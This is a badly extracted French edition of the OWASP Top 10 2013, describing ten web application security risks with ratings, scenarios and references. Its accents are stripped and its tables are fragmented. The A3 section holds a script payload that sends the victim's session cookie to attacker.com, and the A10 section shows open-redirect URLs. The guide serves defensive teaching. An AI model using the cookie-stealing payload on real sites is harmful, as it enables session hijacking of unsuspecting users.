Académique Documents
Professionnel Documents
Culture Documents
OWASP Top 10 - 2013 - French
OWASP Top 10 - 2013 - French
A propos de lOWASP
Prface
LOWASP
Copyright et Licence
Copyright 2003 2013 The OWASP Foundation
Ce document est publi sous licence Creative Commons Attribution ShareAlike 3.0. A chaque
rutilisation ou distribution, vous devez en faire clairement apparatre les conditions contractuelles
Introduction
Bienvenue
Bienvenue dans cette dition 2013 du Top 10 de lOWASP! Cette nouvelle version introduit deux catgories tendues par rapport
la version 2010 afin d'inclure d'importantes vulnrabilits. Elle propose galement une rorganisation des risques, base sur
leur prvalence. Enfin, une nouvelle catgorie de risque voit le jour: la scurit des composants tiers. Ces risques, rfrencs sous
A6 Mauvaise configuration scurit dans la version 2010, ont dsormais une catgorie ddie.
Le Top 10 2013 de l'OWASP est bas sur 8 jeux de donnes de 7 entreprises spcialises dans la scurit des applications, dont 4
socits de conseil et 3 fournisseurs d'outils ou de services SaaS (1 statique, 1 dynamique et 1 statique et dynamique). Ces
donnes couvrent plus 500 000 vulnrabilits travers des centaines d'organisations et des milliers d'applications. Les 10
catgories de risques couvertes par le Top 10 sont slectionnes et hirarchises en fonction de leur frquence, de leur
exploitabilit, de leur dtectabilit et de leurs impacts potentiels.
Lobjectif principal du Top 10 de lOWASP est de sensibiliser les dveloppeurs, concepteurs, architectes, dcideurs, et les
entreprises aux consquences des faiblesses les plus importantes inhrentes la scurit des applications web. Le Top 10 fournit
des techniques de base pour se protger contre ces domaines problmatiques haut risque et fournit des conseils sur la
direction suivre.
Avertissements
Ne vous arrtez pas 10! Il y a des centaines de problmes
qui pourraient influer sur la scurit globale dune
application web comme indiqu dans le Guide du
dveloppeur de lOWASP et la srie des OWASP Cheat
Sheets. Ce se sont des lectures essentielles pour quiconque
dveloppe des applications web. Des conseils sur la manire
de trouver des vulnrabilits dans les applications web sont
fournis dans le Guide de Test et le Guide daudit de Code.
Changement constant. Ce Top 10 voluera dans le temps.
Mme sans modifier une seule ligne de code de votre
application, cette dernire peut dj tre vulnrable une
attaque laquelle personne na pens auparavant. Veuillez
prendre connaissance des conseils la fin de ce document
dans les sections relatives aux dveloppeurs, vrificateurs et
entreprises pour plus dinformation.
Pensez positif! Quand vous serez prt arrter de chasser
les vulnrabilits et vous concentrer sur ltablissement de
contrles solides de scurit des applications, lOWASP a
publi le Standard de Vrification de Scurit Applicative
(ASVS) comme guide pour les entreprises et les auditeurs
dapplications sur ce quil faut vrifier.
Remerciements
Nos remerciements Aspect Security pour avoir initi, pilot
et mis jour le Top 10 de lOWASP depuis sa cration en 2003,
et ses principaux auteurs: Jeff Williams et Dave Wichers.
Aspect Security
HP (rsultats issus des produits Fortify et WebInspect)
Minded Security - Statistiques
Softtek - Statistiques
TrustWave, SpiderLabs Statistiques (voir page 50)
Veracode Statistiques
WhiteHat Security Inc. Statistiques
RN
Notes de version
2010-A8: Manque de restriction daccs une URL est dsormais, 2013-A7: Manque de contrle daccs au niveau
fonctionnel pour couvrir tous les contrles daccs au niveau fonctionnel. Il existe de nombreuses manires de dfinir
quelle fonctionnalit doit tre accde, pas seulement lURL.
4) Nous avons fusionn et largi 2010-A7 et 2010-A9 pour CREER: 2013-A6: Exposition de donnes sensibles.
Cette nouvelle catgorie a t cre en fusionnant 2010-A7 Stockage cryptographique non scuris & 2010-A9
Protection insuffisante de la couche de transport, en y ajoutant le risque de donnes sensibles au niveau du navigateur.
Cette nouvelle catgorie couvre la protection des donnes sensibles (autre que le contrle daccs dj couvert par
2013-A4 et 2013-A7) partir du moment o les donnes sensibles sont fournies par lutilisateur, transmises et stockes
dans lapplication, et renvoyes ensuite au navigateur.
5) Nous avons ajout: 2013-A9: Utilisation de composants avec des vulnrabilits connues:
+
Ce problme a t mentionn comme faisant partie de 2010-A6 Mauvaise configuration de scurit, mais possde
maintenant une catgorie part entire du fait de la croissance rapide du dveloppement base de composants qui a
significativement augment le risque dutilisation de composants connus comme vulnrables
A1 Injection
A1 Injection
Risque
Vecteurs
dAttaque
Vulnrabilits
Attaque
Vulnrabilit
Contrles de
Scurit
Impacts
Techniques
Impacts
Mtier
Impact
Contrle
Bien
Attaque
Vulnrabilit
Contrle
Impact
Fonction
Vulnrabilit
Attaque
Bien
Vulnrabilit
Impact
Contrle
Parfois, ces chemins sont faciles trouver et exploiter, et parfois ils sont extrmement difficiles. De mme, le prjudice caus
peut navoir aucune consquence, ou faire cesser votre activit. Pour dterminer le risque pour votre entreprise, vous pouvez
valuer la probabilit relative chaque agent de menace, vecteur dattaque, et vulnrabilit et les combiner avec une estimation
dimpact technique et financier pour votre entreprise. Ensembles, ces facteurs dterminent le risque global.
Rfrences
Le Top 10 OWASP se concentre sur l'identification des risques les plus graves pour
un large ventail dentreprises. Pour chacun de ces risques, nous fournissons des
informations gnrales sur la probabilit et limpact technique en utilisant le
schma dvaluation des risques suivant, qui est bas sur la Mthodologie
dvaluation des risques OWASP.
OWASP
Agent de
menace
Spcifique
lApplication
Vecteurs
dattaque
Prvalence
de la
vulnrabilit
Dtection de
la
vulnrabilit
Impact
Technique
Facile
Trs rpandue
Facile
Svre
Moyen
Commune
Moyen
Modr
Difficile
Rare
Difficile
Mineur
Impact Mtier
Externes
Spcifiques
lApplication
ou au Mtier
T10
A1 Injection
Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donne non fiable
est envoye un interprteur en tant qu'lment d'une commande ou d'une requte. Les
donnes hostiles de l'attaquant peuvent duper l'interprteur afin de l'amener excuter des
commandes fortuites ou accder des donnes non autorises.
A2 Violation de
Gestion
d'Authentification
et de Session
A3 Cross-Site
Scripting (XSS)
Les failles XSS se produisent chaque fois qu'une application accepte des donnes non fiables et
les envoie un browser web sans validation approprie. XSS permet des attaquants d'excuter
du script dans le navigateur de la victime afin de dtourner des sessions utilisateur, dfigurer des
sites web, ou rediriger l'utilisateur vers des sites malveillants.
A4 Rfrences
directes non
scurises un
objet
Une rfrence directe un objet se produit quand un dveloppeur expose une rfrence un
objet d'excution interne, tel un fichier, un dossier, un enregistrement de base de donnes ou
une cl de base de donnes. Sans un contrle d'accs ou autre protection, les attaquants peuvent
manipuler ces rfrences pour accder des donnes non autorises.
A5 Mauvaise
configuration
Scurit
Une bonne scurit ncessite de disposer d'une configuration scurise dfinie et dploye pour
l'application, contextes, serveur d'application, serveur web, serveur de base de donnes et la
plate-forme. Tous ces paramtres doivent tre dfinis, mis en uvre et maintenus, car beaucoup
ne sont pas livrs scuriss par dfaut. Cela implique de tenir tous les logiciels jour.
A6 Exposition de
donnes sensibles
Beaucoup d'applications web ne protgent pas correctement les donnes sensibles telles que les
cartes de crdit, identifiants d'impt et informations d'authentification. Les pirates peuvent voler
ou modifier ces donnes faiblement protges pour effectuer un vol d'identit, de la fraude la
carte de crdit ou autres crimes. Les donnes sensibles mritent une protection supplmentaire
tel un chiffrement statique ou en transit, ainsi que des prcautions particulires lors de l'change
avec le navigateur.
A7 Manque de
contrle daccs au
niveau fonctionnel
Pratiquement toutes les applications web vrifient les droits d'accs au niveau fonctionnel avant
de rendre cette fonctionnalit visible dans l'interface utilisateur. Cependant, les applications
doivent effectuer les mmes vrifications de contrle d'accs sur le serveur lors de l'accs
chaque fonction. Si les demandes ne sont pas vrifies, les attaquants seront en mesure de forger
des demandes afin d'accder une fonctionnalit non autorise.
A8 - Falsification de
requte intersite
(CSRF)
Une attaque CSRF (Cross Site Request Forgery) force le navigateur d'une victime authentifie
envoyer une requte HTTP forge, comprenant le cookie de session de la victime ainsi que toute
autre information automatiquement inclue, une application web vulnrable. Ceci permet
l'attaquant de forcer le navigateur de la victime gnrer des requtes dont l'application
vulnrable pense qu'elles manent lgitimement de la victime.
A9 - Utilisation de
composants avec
des vulnrabilits
connues
Les composants vulnrables, tels que bibliothques, contextes et autres modules logiciels
fonctionnent presque toujours avec des privilges maximum. Ainsi, si exploits, ils peuvent causer
des pertes de donnes srieuses ou une prise de contrle du serveur. Les applications utilisant
ces composants vulnrables peuvent compromettre leurs dfenses et permettre une srie
d'attaques et d'impacts potentiels.
A10 Redirections
et renvois non
valids
Les applications web rorientent et redirigent frquemment les utilisateurs vers d'autres pages et
sites internet, et utilisent des donnes non fiables pour dterminer les pages de destination. Sans
validation approprie, les attaquants peuvent rorienter les victimes vers des sites de phishing ou
de malware, ou utiliser les renvois pour accder des pages non autorises.
A1
Agents de menace
Injection
Vecteurs
dattaque
Spcifique
Application
Exploitabilit
FACILE
Considrez que
nimporte qui peut
envoyer des
donnes non fiables
au systme, y
compris les
utilisateurs
externes, internes,
et administrateurs.
Lattaquant utilise
des scripts qui
exploitent la
syntaxe dun
interprteur cible.
Presque toute
source de donnes
peut tre un
vecteur dinjection,
y compris des
sources internes.
Vulnrabilit
Prvalence
COMMUNE
Dtection
MOYENNE
Impacts
Technique
Impacts
Mtier
Impact
SEVERE
Spcifique
Application/Mtier
LInjection peut
rsulter en une
perte ou une
corruption de
donnes, une perte
de droits, ou un
refus daccs.
LInjection peut
parfois mener une
prise de contrle
totale du serveur.
Considrez la valeur
mtier de la donne
impacte et la
plateforme
excutant
linterprteur.
Toute donne
pourrait tre vole,
modifie ou
supprime. Votre
rputation pourraitelle en ptir?
Suis-je vulnrable?
2.
3.
Rfrences
OWASP
Externes
CWE Entry 77 on Command Injection
CWE Entry 89 on SQL Injection
CWE Entry 564 on Hibernate Injection
A2
Agents de menace
Violation de Gestion
dAuthentification et de Session
Vecteurs
dAttaque
Spcifique
Application
Exploitabilit
MOYENNE
Considrez des
attaquants externes
anonymes, aussi
bien que des
utilisateurs
lgitimes essayant
de voler des
comptes tiers.
Considrez aussi les
utilisateurs internes
voulant camoufler
leurs actes.
L'attaquant exploite
des fuites/failles
dans les fonctions
de gestion de
sessions et
d'authentification
(e.g. comptes, mots
de passe, IDs de
session) pour
usurper lidentit
des utilisateurs.
Vulnrabilit
Prvalence
RPANDUE
Dtection
MOYENNE
Impacts
Techniques
Impacts
Mtier
Impact
GRAVE
Spcifique
Application/Mtier
De telles failles
permettraient la
compromission
dune partie voir de
tous les comptes.
Une fois effectue,
l'attaquant peut
faire tout ce que la
victime peut. Les
comptes
privilges sont
souvent cibls.
Considrer la valeur
Mtier des donnes
ou des fonctions
applicatives
affectes.
Considrez aussi
l'impact commercial
d une
mdiatisation de la
vulnrabilit.
Suis-je vulnrable?
Rfrences
OWASP
http://example.com/sale/saleitems;jsessionid=
2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii
Un utilisateur authentifi sur le site veut informer ses amis de
la vente. Il envoie le lien ci-dessus sans savoir qu'il fournit
aussi son ID de session. En cliquant sur le lien, ses amis
utiliseront sa session et sa carte de crdit.
Scnario #2: Les timeouts de l'application ne sont pas dfinies
correctement. Un utilisateur accde au site via un ordinateur
public. Au lieu de slectionner "dconnexion", l'utilisateur
ferme simplement le navigateur et s'en va. Un attaquant
utilise le mme navigateur une heure plus tard, et ce
navigateur est encore authentifi.
Scnario #3: Un attaquant interne ou externe obtient un
accs la base des mots de passe du systme. Les mots de
passe ne sont pas correctement chiffrs, exposant les mots
de passe de tous les utilisateurs lattaquant.
1.
satisfaire
aux
exigences
de
vrification
d'authentification (V2) et de gestion de session (V3)
dfinies dans le Standard de Vrification de la
Scurit des Applications (ASVS)
Externes
CWE Entry 287 on Improper Authentication
CWE Entry 384 on Session Fixation
A3
Agents de menace
Spcifique
Application
Exploitabilit
MOYENNE
Considrez
quelquun pouvant
transmettre des
donnes non fiable
au systme, y
compris utilisateurs
externes, internes
et adminstrateurs.
Lattaquant envoie
des scripts qui
exploitent
linterprteur dans
le navigateur. Toute
source de donne
peut tre un
vecteur dattaque y
compris des sources
internes telles que
les donnes dune
base interne.
Vulnrabilit
Prvalence
TRES REPANDUE
Dtection
FACILE
Impacts
Techniques
Impacts
Mtier
Impact
MODR
Spcifique
Application/Mtier
Lattaquant peut
excuter des scripts
dans le navigateur
de la victime pour
dtourner des
sessions, dfigurer
des sites, insrer du
contenu hostile,
rediriger
lutilisateur vers un
site malveillant, etc.
Considrez la valeur
mtier du systme
concern ainsi que
lensemble des
donnes quil traite.
Considrez
galement l'impact
commercial dune
exposition publique
de la vulnrabilit.
Suis-je vulnrable?
2.
3.
Les technologies web 2.0 telles que AJAX rendent les failles
XSS plus difficiles dtecter via les outils automatiss.
4.
Rfrences
OWASP
'><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
Cela provoque l'envoi de l'ID de session de la victime au site
web de l'attaquant, permettant l'attaquant de dtourner la
session en cours de l'utilisateur.
A noter que les attaquants peuvent aussi utiliser XSS pour
tromper les contremesures mises en place pour se protger
des attaques CSRF. Voir A8 pour plus dinformations sur CSRF.
Externes
CWE Entry 79 on Cross-Site Scripting
A4
Agents de menace
Spcifique
Application
Exploitabilit
FACILE
Considrez les
diffrents types
dutilisateurs de
votre systme.
Certains dentre eux
ont-ils un accs
limit aux donnes
en fonction de leur
nature ?
L'attaquant, un
utilisateur lgitime,
substitue la valeur
d'un paramtre
faisant rfrence
un objet, par une
rfrence un
autre objet qui lui
est interdit. Aura-t-il
accs cette
ressource ?
Vulnrabilit
Prvalence
COMMUNE
Dtection
FACILE
Impacts
Techniques
Impacts
Mtier
Impact
MODR
Spcifique
Application/Mtier
Considrez la valeur
marchande des
donnes exposes.
Considrez
galement limpact
li la divulgation
de la vulnrabilit
au grand public.
Suis-je vulnrable ?
2.
Rfrences
OWASP
Externes
CWE Entry 639 on Insecure Direct Object References
CWE Entry 22 on Path Traversal (qui est un exemple
dattaque sur des rfrences directes non scurises)
A5
Agents de menace
Spcifique
Application
Exploitabilit
SIMPLE
Considrez des
attaquants externes
anonymes, ou des
utilisateurs
lgitimes peuvent
tenter de
compromettre le
systme.
Considrez aussi
des internes voulant
dissimuler leurs
actes.
Attaquant accdant
des comptes par
dfaut, pages non
utilises,
vulnrabilits non
corriges, fichiers et
rpertoires non
protgs, etc. Afin
dobtenir des accs
non autoriss ou
des informations
sur le systme.
Vulnrabilit
Prvalence
COMMUNE
Dtectabilit
FACILE
Impacts
Techniques
Impacts
Mtier
Impact
MODERE
Spcifique
Application/Mtier
Cette vulnrabilit
donne souvent aux
attaquants des
accs non autoriss
des systmes ou
des fonctionnalits.
Occasionnellement,
ces vulnrabilits
entrainent une
compromission
complte du
systme.
Le systme peut
tre compromis
sans le savoir.
Lensemble de vos
donnes peut tre
drob ou modifi
lentement dans le
temps. Les cots de
rcupration
peuvent tre
levs.
Suis-je vulnrable?
1.
2.
3.
4.
Rfrences
Scnario #1:
La console dadministration du serveur
dapplication est automatiquement installe et non
dsactive. Les comptes par dfaut ne sont pas modifis.
Lattaquant dcouvre la console , utilise le compte par dfaut
et prend le contrle.
OWASP
Externes
PC Magazine Article on Web Server Hardening
CWE Entry 2 on Environmental Security Flaws
CIS Security Configuration Guides/Benchmarks
A6
Agents de menace
Spcifique
Application
Exploitabilit
DIFFICILE
Considrer tout
acteur interne ou
externe ayant accs
direct aux donnes
sensibles (en mmoire, dans des
fichiers, dans les
sauvegardes, etc.)
ou un rseau par
lequel elles
transitent.
La cryptanalyse
(cassage de lalgorithme ou de la cl)
reste rare. On
prfre obtenir les
cls, intercepter le
trafic ou accder
aux donnes en
clair directement
sur le serveur ou
dans le navigateur.
Vulnrabilit
Prvalence
PEU COMMUNE
Dtection
MOYENNE
Impacts
Techniques
Impacts
Mtier
Impact
SEVERE
Spcifique
Application/Mtier
Lexploitation peut
rsulter en la
compromission ou
la perte de donnes
personnelles, mdicales, financires,
dlments de
cartes de crdit ou
dauthentification,
etc.
Considrer la valeur
conomique des
donnes perdues,
limpact potentiel
pour la rputation
de lorganisation
ainsi que les
implications lgales
pouvant rsulter de
leur perte ou leur
diffusion.
Suis-je vulnrable?
2.
3.
4.
5.
Rfrences
OWASP
1.
2.
3.
4.
5.
Externes
CWE 310 : Cryptographic Issues
CWE 319 : Cleartext Transmission of Sensitive Information
CWE 326 : Weak Encryption
A7
Agents de menace
Spcifique
Application
Exploitabilit
FACILE
Toute personne
pouvant envoyer
une requte
lapplication. Un
utilisateur anonyme
peut-il accder
une fonctionnalit
prive ? Un simple
utilisateur peut-il
accder une
fonctionnalit
privilgie ?
Lattaquant modifie
simplement lURL
ou les paramtres
dune fonction
privilgie. Si laccs
est autoris, cela
signifie que les
utilisateurs peuvent
accder des
fonctionnalits
prives non
protges.
Vulnrabilit
Prvalence
COMMUNE
Dtectabilit
MOYENNE
Impacts
Techniques
Impacts
Mtier
Impact
MODR
Spcifique
Application/Mtier
Ces vulnrabilits
permettent un
attaquant daccder
des fonctionnalits
non autorises.
Prenez en compte
la valeur mtier des
fonctionnalits
exposes et des
donnes quelles
traitent.
Les fonctionnalits
dadministration
sont les cibles
privilgies de ce
type dattaque.
Considrez aussi
limpact sur votre
rputation si la
vulnrabilit
devenait publique.
Suis-je vulnrable ?
1.
2.
3.
1.
2.
3.
Rfrences
OWASP
OWASP Top 10-2007 on Failure to Restrict URL Access
http://exemple.com/app/getappInfo
http://exemple.com/app/admin_getappInfo
Voir ASVS requirements area for Access Control (V4) pour des
exigences additionnelles de contrle daccs.
Externes
CWE Entry 285 on Improper Access Control (Authorization)
A8
Agents de Menace
Spcifique
Application
Exploitabilit
MOYENNE
Lattaquant forge
une requte HTTP
et, par le biais d'une
balise image, d'une
faille XSS ou dune
autre technique,
force le navigateur
mettre la requte,
l'insu de
lutilisateur. Si ce
dernier est
authentifi,
lattaque va russir.
Prvalence
COURANT
Dtectabilit
FACILE
Suis-je vulnrable ?
Impacts
Mtier
Impacts
Techniques
Vulnrabilit
Impact
MODERE
Spcifique
Application/Mtier
Lattaquant peut
forcer la victime
raliser nimporte
quelle opration
de changement
dtat autorise
la victime.
Estimer la valeur
mtier des donnes
et des fonctions qui
pourraient tre
affectes.
Imaginer limpact
quil y aurait ne
Ainsi, il peut la
pas savoir si les
forcer modifier
actions ralises,
son compte,
ont t faites
faire des achats, intentionnellement
se dconnecter ou ou pas, par vos
mme se
utilisateurs.
connecter.
Estimer limpact sur
votre rputation.
Rfrences
OWASP
OWASP CSRF Article
OWASP CSRF Prevention Cheat Sheet
OWASP CSRFGuard - CSRF Defense Tool
ESAPI Project Home Page
Externes
CWE Entry 352 on CSRF
A9
Agents de menace
Spcifique
Application
Exploitabilit
MOYENNE
Certains composants
vulnrables (Ex:
bibliothques) peuvent
tre identifies et
exploites laide
doutils automatiss,
augmentant la
population des agents de
menace, qui peuvent
tre utiliss au del des
attaques cibles par des
hacktivistes.
Vulnrabilit
Prvalence
DIFFUSION
Dtection
DIFFICILE
Impacts
Technique
Impacts
Mtier
Impact
MODR
Spcifique
Application/Mtier
Le paysage complet
des faiblesses est
envisageable :
injection, violation de
contrle daccs, XSS,
etc. Limpact peut tre
minime, ou entraner
la compromission
totale du systme ou
une atteinte aux
donnes.
Prendre en compte ce
quimplique la
vulnrabilit pour le
mtier utilisant
lapplication touche.
Cela peut tre bnin
ou correspondre
une compromission
totale.
Suis-je vulnrable?
Une option est de ne pas utiliser des composants que vous navez pas vous
mme crit. Mais cela nest pas trs raliste.
De nombreux projets de composants ne fournissent pas de correctifs de
scurit pour les anciennes versions. A la place, le problme tant
simplement corrigs dans la version suivante. De ce fait, effectuer une
monte de version est critique.
Les projets logiciels devraient avoir un processus en place pour :
1) Identifier tous les composants et les versions utilises, ainsi que les
dpendances (ex: le plugin des versions).
2) Surveiller les bases de donnes publiques, les listes de diffusion des
projets et les listes de diffusion de scurit afin de sassurer de la
scurit de ces composants afin de les maintenir jour.
3) tablir des politiques de scurit pour lutilisation des composants,
telles que la mise en place de pratiques de dveloppement scuris, le
passage avec succs des recettes scurit et lutilisation de composants
sous License.
4) Si possible, essayer dajouter des filtres de scurits autour des
composants afin de dsactiver des fonctionnalits et/ou des parties
comprenant des faiblesses ou des fonctions vulnrables.
Rfrences
OWASP
OWASP Dependency Check (for Java libraries)
OWASP SafeNuGet (for .NET libraries thru NuGet)
Good Component Practices Project
Externes
The Unfortunate Reality of Insecure Libraries
Open Source Software Security
Addressing Security Concerns in Open Source Components
MITRE Common Vulnerabilities and Exposures
Example Mass Assignment Vulnerability that was fixed
in ActiveRecord, a Ruby on Rails GEM
A10
Agents de menace
Spcifique
Application
Exploitabilit
MOYENNE
Considrez toute
personne pouvant
tromper vos
utilisateurs lors
dune requte sur
votre site web.
Nimporte quel site
web ou flux HTML
peut tre utilis
cette fin.
Vulnrabilit
Prvalence
RARE
Dtection
FACILE
Impacts
Technique
Impacts
Mtier
Impact
MODERE
Spcifique
Application/Mtier
Certaines redirections
essayent
dencourager les
victimes installer
des logiciels malicieux
ou fournir des
informations
sensibles. Des renvois
non srs peuvent
amener le
contournement de
contrles daccs.
Suis-je vulnrable?
1.
1.
2.
3.
2.
3.
Rfrences
OWASP
http://www.example.com/redirect.jsp?url=evil.com
Scnario #2: Une application effectue des renvois pour
rediriger les utilisateurs sur certaines pages internes. Pour
simplifier le renvoi, certaines pages utilisent un paramtre
contenant la page o doit tre renvoyer lutilisateur. Dans ce
cas, un attaquant cre une URL satisfaisant les contrles
d'accs de l'application et le redirigeant ensuite vers une
fonction dadministration laquelle il ne devrait pas avoir
accs.
http://www.example.com/boring.jsp?fwd=admin.jsp
Externes
CWE Entry 601 on Open Redirects
WASC Article on URL Redirector Abuse
Google blog article on the dangers of open redirects
OWASP Top 10 for .NET article on Unvalidated Redirects and
Forwards
+D
Exigences
de scurit de
lapplication
Architecture
applicative
scurise
Contrles de
scurit
communs
Cycle de
dveloppement
scuris
Formation
la scurit
applicative
Afin de produire une application web scurise, vous devez d'abord dfinir ce que cela signifie
pour cette application. Utilisez le standard de vrification de la scurit d'une application (ASVS)
comme guide pour dterminer les exigences de scurit de votre application.
Si le dveloppement de lapplication est sous-trait, utilisez plutt l'annexe contractuelle pour du
logiciel scuris de l'OWASP.
Il est bien plus efficace dintgrer la scurit dans une application ds sa conception plutt que
d'identifier les failles et les corriger a posteriori. Les aide-mmoire de l'OWASP ont pour objectif
de vous guider dans cette tche. LOWASP recommande galement la lecture du guide de
dveloppement OWASP.
Il est particulirement difficile de concevoir des contrles de scurit fiables et simples utiliser.
Un jeu de contrles standard simplifie radicalement le dveloppement d'applications scurises.
L'OWASP recommande comme modle pour le dveloppement scuris des APIs de votre
application le projet "OWASP Enterprise Security API (ESAPI)". Il inclut des implmentations de
rfrence en Java, .NET, PHP, Classic ASP, Python et Cold Fusion.
Afin d'amliorer le processus que suit votre organisation pour le dveloppement d'applications,
l'OWASP recommande l'"OWASP Software Assurance Maturity Model (SAMM)". Ce modle aide
les organisations formuler et implmenter une stratgie adapte aux risques spcifiques
auxquels elles sont confrontes.
Le projet ducation de l'OWASP met disposition des ressources de formation afin d'aider la
sensibilisation des dveloppeurs. Il regroupe une liste de prsentations cette fin. Afin de vous
confronter aux vulnrabilits les plus courantes, essayez l'OWASP WebGoat, WebGoat.NET ou
encore le projet applications web dfaillantes. Et pour rester jour, venez assister une
confrence AppSec OWASP, une session de formation, ou une runion du chapitre OWASP local.
De nombreuses autres ressources OWASP sont disponibles. Consultez la page des projets OWASP qui les recense, organiss selon
leur niveau de maturit (Release Quality, Beta, ou Alpha). La plupart des ressources OWASP sont disponibles sur le wiki, et un
grand nombre de documents OWASP peuvent tre commands au format papier ou lectronique (eBook).
+V
Soyez Organis
Afin de vrifier la scurit dune application web que vous avez dvelopp ou que vous envisagez dacqurir, lOWASP
recommande dexaminer le code applicatif (si le code source est disponible) et de tester lapplication. LOWASP recommande la
combinaison dune revue du code lie la scurit et ltablissement dun test dintrusion applicatif ds que cela savre
possible, cela permet daugmenter le niveau de rsultat des deux techniques, les deux approches se compltant mutuellement.
Les outils facilitant le processus de vrification peuvent amliorer lefficience et lefficacit dun analyste expert. Les outils
dvaluation de lOWASP se focalisent sur laide apporte un expert afin de devenir plus efficace, plutt que de tenter
dautomatiser le processus danalyse.
Standardisation Comment Vrifiez Vous la Scurit dApplication Web: Afin daider les organisations dvelopper de la
cohrence et de dfinir un niveau de rigueur lors de lvaluation dapplications web, lOWASP a produit lOWASP Standard de
Vrification de Scurit Applicative (ASVS). Ce document dfinit un standard de vrification minimum pour effectuer lvaluation
de scurit des applications web. LOWASP recommande dutiliser ASVS comme guide pas seulement lorsque vous vrifiez la
scurit dune application Web, mais aussi sur les techniques les plus appropries utiliser, et de vous aider dfinir et
slectionner un niveau de rigueur lorsque vous vrifiez la scurit dapplication web. LOWASP recommande par ailleurs
lutilisation de lASVS pour vous aider dfinir et slectionner tout service dvaluation dapplication web que vous pourriez vous
procurer par un fournisseur tiers.
Suite dOutils dEvaluation : Le projet OWASP Live CD consolide plusieurs des meilleurs outils de scurit open source dans un
environnement de dmarrage ou dans une machine virtuelle (VM). Les dveloppeurs web, testeurs, et professionnels de la
scurit peuvent excuter ce Live CD, or excuter la VM, et immdiatement avoir accs une suite complte de test de scurit.
Aucune installation ni configuration nest requise pour utiliser les outils fournis sur ce CD.
Revue de Code
+O
Pour
commencer
Approche
base sur le
risque
Partez sur
des bases
solides
Adoptez une liste prcise de normes et standards dfinissant les rgles de base de la scurit des
applications qui devront tre adoptes par les quipes de dveloppement.
Dfinissez une liste commune de contrles priodiques qui compltent ces politiques et normes et
qui fournisse les conseils de conception et de dveloppement sur leur utilisation.
Mettez en place un programme de formation spcifique la scurit des applications s'adressant aux
diffrents mtiers et sujets de dveloppement.
Intgrez la
scurit dans
les processus
existants
Rendez vos
indicateurs
visibles
Grez avec des mtriques. Pilotez les dcisions de financement et d'amlioration en vous basant sur
les mtriques et les donnes d'analyse recenses. Les mtriques comprennent le respect des
pratiques / activits de scurit, les vulnrabilits introduites, les vulnrabilits attnues, la
couverture de l'application, la densit de dfauts par type et par nombre d'instances, etc.
Analysez les donnes des activits de mise en uvre et de vrification pour rechercher la cause
premire et des modles de vulnrabilit pour conduire des amliorations stratgiques et
systmiques travers l'entreprise.
+R
Vecteurs
dattaque
Impacts
Techniques
Vulnrabilit
Agents de menace
Spcifique
lApplication
Exploitabilit
MOYENNE
Prvalence
TRES REPANDUE
Dtection
FACILE
Impact
MODERE
*
2
Impacts
Mtiers
Spcifique
Application/Mtier
+F
RISQUES
Agents
de Menace
Vecteurs
dattaque
Vulnrabilit
Exploitabilit
Prvalence
Dtection
Impacts
Techniques
Impacts
Mtier
Impact
A1-Injection
Spcifique
lApplication
FACILE
COMMUNE
MOYENNEMENT
SVRE
Spcifique
lApplication
A2-Auth et Sess
Spcifique
lApplication
MOYENNE
RPANDUE
MOYENNEMENT
SVRE
Spcifique
lApplication
A3-XSS
Spcifique
lApplication
MOYENNE
TRS RPANDUE
FACILEMENT
MODR
Spcifique
lApplication
Spcifique
lApplication
FACILE
COMMUNE
FACILEMENT
MODR
Spcifique
lApplication
A5-Config
Spcifique
lApplication
FACILE
COMMUNE
FACILEMENT
MODR
Spcifique
lApplication
A6-Donnes
Spcifique
lApplication
DIFFICILE
RARE
MOYENNEMENT
SVRE
Spcifique
lApplication
A7-ACL Fonc.
Spcifique
lApplication
FACILE
COMMUNE
MOYENNEMENT
MODR
Spcifique
lApplication
A8-CSRF
Spcifique
lApplication
MOYENNE
COMMUNE
FACILEMENT
MODR
Spcifique
lApplication
A9-Composants
Spcifique
lApplication
MOYENNE
RPANDUE
DIFFICILEMENT
MODR
Spcifique
lApplication
A10-Redirection
Spcifique
lApplication
MOYENNE
RARE
FACILEMENT
MODR
Spcifique
lApplication
LOpen Web Application Security Project (OWASP) est une communaut mondiale libre et ouverte ayant pour but
l'amlioration de la scurit des applications logicielles. Notre mission est de rendre la scurit des applications
visible , pour que les particuliers et les entreprises puissent prendre des dcisions tenant compte des risques de
scurit lis aux applications. Chacun est libre de participer l'OWASP et tous nos supports sont disponibles sous
licence libre et gratuite. La Fondation OWASP est une association but non lucratif de type 501c3 qui garantit la
disponibilit future et le support de nos travaux.